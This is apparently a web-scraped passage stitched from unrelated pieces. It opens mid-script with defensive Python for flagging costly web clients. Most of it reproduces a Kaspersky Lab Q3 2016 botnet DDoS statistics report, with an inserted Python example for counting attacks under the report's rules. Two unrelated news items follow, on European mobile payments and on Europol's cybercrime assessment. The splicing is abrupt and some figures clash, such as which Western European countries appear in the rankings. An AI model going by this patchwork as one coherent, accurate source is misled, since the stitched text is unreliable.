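    print("busiest client by request count:", top_talker(SAMPLE_LOG))
    for p in flag_suspects(SAMPLE_LOG):
        print(f"{p.ip}: {p.requests} requests, {p.request_share:.1%} of requests, "
              f"{p.cost_share:.1%} of server time")
```

On the constructed sample, a request-count top-talker list ranks the ordinary visitors first, while the cost-weighted view puts the three search queries at over 90% of server time. The thresholds need tuning against a baseline of legitimate heavy users (crawlers, logged-in reporting pages), so the flags are a starting point for rate limits or challenge pages on the expensive endpoints rather than an automatic block.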
In addition, most of these attacks have similar features, making it easy to block them completely, and ensuring their effectiveness is eroded over time. The desire of website owners to protect data and improve privacy levels, combined with cheaper computing capacities have resulted in a growing trend: classic HTTP is being replaced by HTTPS, leading to an increase in the proportion of resources using encryption.

The development of web-based technology encourages active adoption of the new HTTP/2 protocol, which the latest browsers support only over encrypted connections. We believe that the number of encryption-based attacks will grow.

For developers of information security solutions this requires an immediate reappraisal of their approach to combating distributed attacks, because today’s tried and tested solutions may soon become ineffective.

Statistics for botnet-assisted DDoS attacks

Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity.

The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data. This report contains the DDoS Intelligence statistics for the third quarter of 2016. In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours.
If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack.

Attacks on the same web resource from two different botnets are also regarded as separate attacks. The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses.
In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics. It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab.
It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q3 Summary

Resources in 67 countries (vs. 70 in Q2) were targeted by DDoS attacks in Q3 2016. 62.6% of targeted resources were located in China. China, the US and South Korea remained leaders in terms of both the number of DDoS attacks and number of targets.

For the first time both rankings included Italy. The longest DDoS attack in Q3 2016 lasted for 184 hours (or 7.6 days) – significantly shorter than the previous quarter’s maximum (291 hours or 12.1 days). A popular Chinese search engine was subjected to the largest number of attacks (19) over the reporting period. SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios.

The proportion of attacks using the SYN DDoS method continued to grow, increasing by 5 p.p., while the shares of TCP DDoS and HTTP DDoS continued to decline. In Q3 2016, the percentage of attacks launched from Linux botnets continued to increase and reached 78.9% of all detected attacks.

Geography of attacks

In Q3 2016, the geography of DDoS attacks narrowed to 67 countries, with China accounting for 72.6% (4.8 p.p. less than the previous quarter).
In fact, 97.4% of the targeted resources were located in just 10 countries.

The other two countries in the top three switched places – the US (12.8%) overtook South Korea (6.3%) to become the second most targeted country.

Distribution of DDoS attacks by country, Q2 2016 vs. Q3 2016

One entry of note to the rating of most targeted countries was Italy, appearing for the first time ever and accounting for 0.6% of all attacks.
In all, the TOP 10 included three Western European countries (Italy, France and Germany). This quarter’s statistics show that targets within the leading 10 countries accounted for 96.9% of all attacks.

Distribution of unique DDoS attack targets by country, Q2 2016 vs. Q3 2016

In Q3 2016, 62.6% of attacks (8.7 p.p. less than the previous quarter) targeted resources located in China. However, targets in the US became more attractive for cybercriminals – the country’s share accounted for 18.7% compared with 8.9% in the previous quarter.
South Korea rounded off the top three – its contribution decreased by 2.4 p.p. and amounted to 8.7%. The shares of the other countries in the TOP 10 increased, with the exception of France (0.4%), which saw a fall of 0.1 p.p. Japan (1.6%) and Italy (1.1%) each saw a 1 p.p. increase, and as a result, Italy entered the TOP 10 for the first time and went straight in at 6th place (Ukraine left the TOP 10).

The proportion of attacks targeting Russia also grew significantly – from 0.8% to 1.1%. This rating also included three Western European countries – Italy, France and the Netherlands.

Changes in DDoS attack numbers

DDoS activity was relatively uneven in Q3 2016.

The period between 21 July and 7 August was marked by the highest DDoS activity, with peaks in the number of attacks registered on 23 July and 3 August.

From 8 August, DDoS activity plummeted and resulted in a lull which lasted from 14 August till 6 September.

The smallest number of attacks was recorded on 3 September (22 attacks).

The largest number of attacks was observed on 3 August – 1,746 attacks. Note that this is the highest figure for the first three quarters of 2016. Most of these attacks took place on the servers of just one service provider located in the United States.

Number of DDoS attacks over time* in Q3 2016

* DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. once for each day of its duration.
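The counting rules given in the Methodology (one attack per target and botnet as long as no pause in activity exceeds 24 hours; a longer pause or a second botnet starts a new attack; targets counted by unique IP address) and the footnote to the timeline above (an attack spanning several days is counted once per day) are easy to state and easy to get subtly wrong when reproducing figures of this kind. The following Python is added here and is not the DDoS Intelligence system’s own code: it implements both rules over a constructed set of observed C&C commands. The event model (observation time, target IP, botnet identifier) is an assumption about what such a feed records, and the sample events are constructed.

```python
"""Grouping observed botnet commands into 'attacks' under the report's
counting rules, and building the per-day timeline in which one attack is
counted once for each day it spans.

Added example, not the DDoS Intelligence system's code. The event model
(time, target IP, botnet id) is an assumption; the events are constructed.
"""
from collections import Counter
from datetime import datetime, timedelta
from typing import NamedTuple

# A break of MORE than 24 h in the same botnet's activity against the same
# target starts a new attack (the report's definition).
MAX_GAP = timedelta(hours=24)


class Event(NamedTuple):
    ts: datetime     # when the C&C command was observed
    target: str      # attacked IP address
    botnet: str      # identifier of the botnet that issued the command


class Attack(NamedTuple):
    target: str
    botnet: str
    start: datetime
    end: datetime

    @property
    def duration_hours(self) -> float:
        return (self.end - self.start).total_seconds() / 3600


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


# Constructed sample of observed commands (not real telemetry; IPs are from
# the documentation range 192.0.2.0/24).
SAMPLE_EVENTS = [
    Event(_ts("2016-07-23 10:00"), "192.0.2.5", "botnet-1"),
    Event(_ts("2016-07-23 12:00"), "192.0.2.5", "botnet-2"),  # other botnet: separate attack
    Event(_ts("2016-07-23 20:00"), "192.0.2.5", "botnet-1"),
    Event(_ts("2016-07-24 06:00"), "192.0.2.5", "botnet-1"),  # 10 h gap: same attack
    Event(_ts("2016-07-26 12:00"), "192.0.2.5", "botnet-1"),  # 54 h gap: new attack
    Event(_ts("2016-07-26 15:00"), "192.0.2.5", "botnet-1"),
    Event(_ts("2016-08-03 01:00"), "192.0.2.9", "botnet-1"),
    Event(_ts("2016-08-03 23:00"), "192.0.2.9", "botnet-1"),
    Event(_ts("2016-08-04 22:00"), "192.0.2.9", "botnet-1"),  # 23 h gap: same attack
    Event(_ts("2016-08-05 21:00"), "192.0.2.9", "botnet-1"),  # 23 h gap: same attack
]


def group_attacks(events) -> list:
    """Merge consecutive commands from the same botnet against the same target
    into one attack unless they are separated by more than MAX_GAP."""
    attacks = []
    open_attacks = {}   # (target, botnet) -> Attack still being extended
    for ev in sorted(events, key=lambda e: (e.target, e.botnet, e.ts)):
        key = (ev.target, ev.botnet)
        current = open_attacks.get(key)
        if current is not None and ev.ts - current.end <= MAX_GAP:
            open_attacks[key] = current._replace(end=ev.ts)
        else:
            if current is not None:
                attacks.append(current)
            open_attacks[key] = Attack(ev.target, ev.botnet, ev.ts, ev.ts)
    attacks.extend(open_attacks.values())
    return sorted(attacks, key=lambda a: a.start)


def unique_targets(attacks) -> int:
    """Targets are counted by unique IP address, whatever the number of attacks."""
    return len({a.target for a in attacks})


def longest_attack(attacks) -> Attack:
    return max(attacks, key=lambda a: a.duration_hours)


def daily_timeline(attacks) -> Counter:
    """Count each attack once for every calendar day it spans; this is why the
    per-day figures can add up to more than the number of distinct attacks."""
    per_day = Counter()
    for a in attacks:
        day = a.start.date()
        while day <= a.end.date():
            per_day[day] += 1
            day += timedelta(days=1)
    return per_day


if __name__ == "__main__":
    found = group_attacks(SAMPLE_EVENTS)
    print(len(found), "attacks against", unique_targets(found), "unique targets")
    print("longest:", longest_attack(found).duration_hours, "hours")
    for day, n in sorted(daily_timeline(found).items()):
        print(day, n)
```

On the constructed events the ten commands collapse to four attacks against two targets (the second botnet and the 54-hour pause each start a new one), the longest runs for 68 hours, and the timeline holds seven attack-days, which is the double counting the footnote warns about.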
In Q3, Friday was the most active day of the week for DDoS attacks (17.3% of attacks), followed by Thursday (15.2%). Monday, which was second in Q2 with 15%, became the quietest day of the week in terms of DDoS attacks (12.6%).

Distribution of DDoS attack numbers by day of the week, Q2 and Q3 2016

Types and duration of DDoS attacks

The rating of the most popular attack methods saw no considerable changes from the previous quarter.

The SYN DDoS method has further strengthened its position as leader: its share increased from 76% to 81%.

The proportion of the other attack types decreased slightly.
ICMP DDoS was most affected: its share decreased by 2.6 p.p.

Distribution of DDoS attacks by type, Q2 and Q3 2016

Attacks that last no more than four hours remained the most popular: in Q3 their share increased by 9.2 p.p., accounting for 69%.

Attacks that lasted 5-9 hours remained in second place. Meanwhile, the percentage of longer attacks decreased considerably – the share of attacks lasting 100-149 hours fell from 1.7% in Q2 to 0.1% in the third quarter.

There were very few cases of attacks lasting longer than that.

Distribution of DDoS attacks by duration (hours), Q2 and Q3 2016

The longest DDoS attack in Q3 2016 only lasted for 184 hours (targeting a Chinese provider), which is significantly lower than the Q2 maximum of 291 hours. A Chinese search engine had the unenviable distinction of being attacked most – it was targeted 19 times during the quarter.

C&C servers and botnet types

In Q3, the highest number of C&C servers (45.8%) was detected in South Korea, although this country’s contribution is considerably smaller compared to the previous quarter (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China and the US – although their total share was 67.7% vs. 84.8% in Q2. The number of active C&C servers in Western Europe is growing – the TOP 10 included the Netherlands (4.8%), the UK (4.4%), and France (2%).

To recap, three Western European countries entered both the TOP 10 countries subjected to the highest number of attacks and the TOP 10 countries with the highest number of targets. Among the newcomers to the C&C rating were Hong Kong and Ukraine, each with a share of 2%.

Distribution of botnet C&C servers by country in Q3 2016

In Q3, Linux-based DDoS bots remained the clear leader and the share of attacks launched from Linux botnets continued to grow, accounting for 78.9% vs. 70.8% in Q2.

This correlates with the growing popularity of SYN DDoS for which Linux bots are the most appropriate tool.
In addition, this can be explained by the growing popularity of Linux-based IoT devices used for DDoS attacks, and will most probably be boosted further after the leakage of Mirai.

Correlation between attacks launched from Windows and Linux botnets, Q2 and Q3 2016

Q3 continues the trend of Linux dominance from the previous quarter. Prior to Q2 2016, the difference between the share of Windows- and Linux-based botnets did not exceed 10 p.p. for several quarters in a row. The majority of attacks – 99.8% – were carried out by bots belonging to a single family.

Cybercriminals launched attacks using bots from two different families in just 0.2% of cases.

Conclusion

‘Classic’ botnet attacks based on widespread malware tools such as Pandora, Drive, etc. have been well researched by analysts who have developed effective and simple methods of neutralizing attacks that utilize these tools.

This is increasingly forcing cybercriminals to use more sophisticated attack methods, including data encryption and new approaches to the development of tools used for organizing attacks and building botnets. Another interesting trend this quarter was the increased activity of DDoS botnets in Western Europe.

For the first time in a year the TOP 10 most attacked countries included three Western European countries – Italy, France and Germany.

This correlates with the increased number of active C&C servers in Western Europe, particularly in France, the UK and the Netherlands. Overall, Western European countries accounted for about 13% of active DDoS botnet C&C servers.

Europe loves to pay by bonk* – survey

Mobile payments going gangbusters, beams Visa

Consumers’ use of a mobile device – either a smartphone, tablet or wearable – to make payments has tripled over the past year, according to a Visa-backed survey. The number of Europeans regularly using a mobile device for payments has tripled from 18 per cent to 54 per cent since 2015, according to the results of an online poll of 36,000 consumers in 19 European countries.

Uptake is strong in both developing markets, such as Turkey, where mobile has leapfrogged traditional payment methods, and in tech-savvy markets, such as the Nordics.

In the UK, over two-fifths (43 per cent) purchase high-value items such as holidays and electronics on a mobile device, as well as using their mobiles for regular transactions such as paying household bills (42 per cent) and buying bus or train tickets (41 per cent). More than half the Brits surveyed (58 per cent) used contactless cards this year, up from 20 per cent in 2015. Meanwhile mobile banking activity is increasing across all age groups, according to Visa.

The launch of Apple Pay and Android Pay in Europe is helping to push the payments-by-mobile-device trend, which Kevin Jenkins, UK & Ireland managing director at Visa, described as the “future of digital payments”.

Infosec experts struck a much more cautious note. Mark James, security specialist at ESET, commented: “It’s no surprise that mobile payments are now becoming more widely used and now we have integrated biometric authentication into our phones it definitely makes it a lot safer for the end user to utilise that technology to their advantage.”

“Using a mobile device is so easy, from getting the payment card on to the phone through to actually making the payment and much like credit cards, often too easy,” James added. “Phone manufacturers want your device to be the very centre of your digital life; it interacts with us throughout the day and often is used to wake us first thing in the morning.
It makes sense that our finances will also be controlled and managed from these devices and we will definitely see more and more companies making it easy for us to pay on mobile devices.

But let’s not forget security; it is very important to understand the risks of using your phone for payments, boarding passes and everything else we do.” ®

* Tap (mobile phone) to pay. The phrase "pay by bonk" was coined by former Reg mobile supremo Bill Ray back in 2012...

Urgent! Log in for spear-phisher survey or your account will be...

Europol: Cybercrims getting more devious

Europol’s annual cyber-crime survey warns that the quality of spear-phishing and other "CEO fraud" continues to improve, and that "cybercrime-as-a-service" means an ever larger group of fraudsters can easily commit online attacks.

Many threats remain from last year – banking trojan attacks are still an issue for businesses and individuals, although they have now been eclipsed by ransomware, which is growing more quickly. The ease of access to cyber-crime tools means that in many European countries it now exceeds real-world crime in terms of value.

The report warns that although there is very limited use of these tools by extremist groups, the fact that they are simple to use, and fairly simple to access via the Dark web, means that could quickly change. It notes that while such groups make wide use of social media for propaganda and recruitment, there is little evidence of use of cyber-attack capabilities beyond website defacement.

Europol is also seeing the first evidence of organised criminal gangs beginning to exploit contactless cards. It warns of increasing use of booter/stresser tools to run DDoS attacks. It has also seen a marked improvement in the quality and apparent authenticity of spear-phishing attacks – making them ever harder to separate from genuine communications.

Data remains a key target for cybercrims.

But they’re increasingly using it to encrypt for ransom, for direct extortion or to further more complex fraud, not just for immediate gain.

Another change this year is an increase in live-streamed child sexual abuse. Europol said: “The use of end-to-end encrypted platforms for sharing media, coupled with the use of largely anonymous payment systems, is facilitating an escalation in the live streaming of child abuse. Offenders target regions where there are high levels of poverty, limited domestic child protection measures and easy access to children.”

Beyond recommending more resources for cyber-crime law enforcement, Europol wants more collaboration and intelligence sharing to deal with Darknet investigations, prevent duplication of effort and improve sharing of tools and tactics. More broadly, it calls for a phenomenon-based approach to replace incident response.
It notes that successes in combating fraud in the airline industry could be replicated for other industries.

It also recommends operations targeting offenders who need to be in a physical location – such as a car rental desk – in order to collect the proceeds of cyber-crime.

The full Internet Organised Crime Threat Assessment 2016 is available to download here.